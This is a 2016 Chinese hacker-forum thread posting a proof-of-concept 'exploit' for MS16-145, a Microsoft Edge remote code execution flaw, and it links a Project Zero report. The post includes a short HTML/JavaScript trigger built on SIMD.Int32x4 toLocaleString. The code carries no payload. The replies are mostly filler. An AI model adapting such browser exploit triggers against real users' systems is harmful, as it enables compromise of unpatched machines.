(MS16-145)Microsoft Edge远程代码执行漏洞Exploit

90_ · 发表于 2016-12-22 15:15:32

执行摘要
此安全更新程序可修复 Microsoft Edge 中的漏洞。
如果用户使用 Microsoft Edge 查看经特殊设计的网页，那么其中最严重的漏洞可能允许远程执行代码。
成功利用这些漏洞的攻击者可以获得与当前用户相同的用户权限。

https://bugs.chromium.org/p/project-zero/issues/detail?id=961

Exp：

[HTML] 纯文本查看 复制代码

<html><body><script>
    try{
    var v = SIMD.Int32x4(1, 2, 3, 4);
    alert(v.toLocaleString(1, 2, 3, 4, 5, 6, 7));
    }catch(e){
    alert(e.message);
 
}
</script></body></html>

菜鸟小羽 · 发表于 2016-12-22 15:28:58

支持，看起来还是可以的

08-wh · 发表于 2016-12-22 18:28:43

Jack-5 · 发表于 2016-12-22 19:38:38

支持中国红客联盟(ihonker.org)

菜鸟小羽 · 发表于 2016-12-22 19:54:58

支持，看起来还是可以的

54hacker · 发表于 2016-12-22 20:10:41

支持，看起来还是可以的

Jack-5 · 发表于 2016-12-22 20:26:56

ljy07 · 发表于 2016-12-22 20:54:25

支持，看起来还是可以的

wilist · 发表于 2016-12-22 21:26:32

我是来水经验的……

54hacker · 发表于 2016-12-22 21:42:40

我是来水经验的……

(MS16-145)Microsoft Edge远程代码执行漏洞Exploit

指导单位

旗下站点

联系我们